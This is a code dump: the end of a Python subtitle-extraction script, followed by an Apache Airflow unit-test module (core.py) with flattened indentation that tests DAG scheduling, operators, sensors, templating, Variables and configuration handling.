if len(os.listdir(self.frame_output_dir)) > 0:
for i in os.listdir(self.frame_output_dir):
os.remove(os.path.join(self.frame_output_dir, i))
if __name__ == '__main__':
# Prompt the user to enter the video path
video_path = input(f"{interface_config['Main']['InputVideo']}").strip()
# Prompt the user to enter the subtitle area
ymin, ymax, xmin, xmax = map(int, input(f"{interface_config['Main']['ChooseSubArea']} (ymin ymax xmin xmax):").split())
subtitle_area = (ymin, ymax, xmin, xmax)
# Create the subtitle extractor object
se = SubtitleExtractor(video_path, subtitle_area)
# Start extracting subtitles
se.run()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import bleach
import doctest
import json
import logging
import os
import re
import unittest
import multiprocessing
import mock
from numpy.testing import assert_array_almost_equal
import tempfile
from datetime import time, timedelta
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
from freezegun import freeze_time
import signal
from six.moves.urllib.parse import urlencode
from time import sleep
import warnings
from dateutil.relativedelta import relativedelta
import sqlalchemy
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.http_operator import SimpleHttpOperator
from airflow.operators import sensors
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
# These defaults make the test faster to run
default_scheduler_args = {"file_process_interval": 0,
"processor_poll_interval": 0.5,
"num_runs": 1}
def setUp(self):
configuration.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag = dag
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(datetime(2015, 1, 2, 0, 0), dag_run.execution_date, msg=
'dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date))
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(DEFAULT_DATE + delta, dag_run.execution_date, msg=
'dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date))
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_time_sensor(self):
t = sensors.TimeSensor(
task_id='time_sensor_check',
target_time=time(0),
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='time_sensor_check',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import subprocess
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='time_sensor_check',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timedelta_sensor(self):
t = sensors.TimeDeltaSensor(
task_id='timedelta_sensor_check',
delta=timedelta(seconds=2),
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor(self):
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_delta(self):
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_delta=timedelta(0),
allowed_states=['success'],
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
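    # The next test reuses test_time_sensor to create a successful upstream run
    # before exercising the execution_date_fn variants of ExternalTaskSensor.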
def test_external_task_sensor_fn(self):
self.test_time_sensor()
# check that the execution_fn works
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_date_fn=lambda dt: dt + timedelta(0),
allowed_states=['success'],
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        # double-check that execution_date_fn is actually used by pointing it at an
        # execution date with no matching run, which should make the sensor time out
t2 = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_date_fn=lambda dt: dt + timedelta(days=1),
allowed_states=['success'],
timeout=1,
poke_interval=1,
dag=self.dag)
with self.assertRaises(exceptions.AirflowSensorTimeout):
t2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_error_delta_and_fn(self):
"""
Test that providing execution_delta and a function raises an error
"""
with self.assertRaises(ValueError):
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_delta=timedelta(0),
execution_date_fn=lambda dt: dt,
allowed_states=['success'],
dag=self.dag)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
            if templates_dict['ds'] != ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1], context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'success':False,
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
val['success'] = True
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(val['success'])
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'success': False,
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
val['success'] = True
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(val['success'])
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'success': False,
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
val['success'] = True
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
on_success_callback=verify_templated_field,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(val['success'])
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
        # Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
configuration.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get("core", "FERNET_KEY")
configuration.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
        # use assert_array_almost_equal from numpy.testing since we are
        # comparing floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_cyclic_dependencies_1(self):
regexp = "Cycle detected in DAG. (.*)runme_0(.*)"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_upstream(self.run_after_loop)
def test_cyclic_dependencies_2(self):
regexp = "Cycle detected in DAG. (.*)run_after_loop(.*)"
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_downstream(self.runme_0)
def test_cyclic_dependencies_3(self):
regexp = "Cycle detected in DAG. (.*)run_this_last(.*)"
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_this_last.set_downstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = (
session.query(TI)
.filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE)
.one()
)
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
        # the failed task should have run for at least the 3 second execution timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE+timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
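    # run_command should return the decoded unicode output of the command and
    # raise AirflowConfigException when the command exits non-zero.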
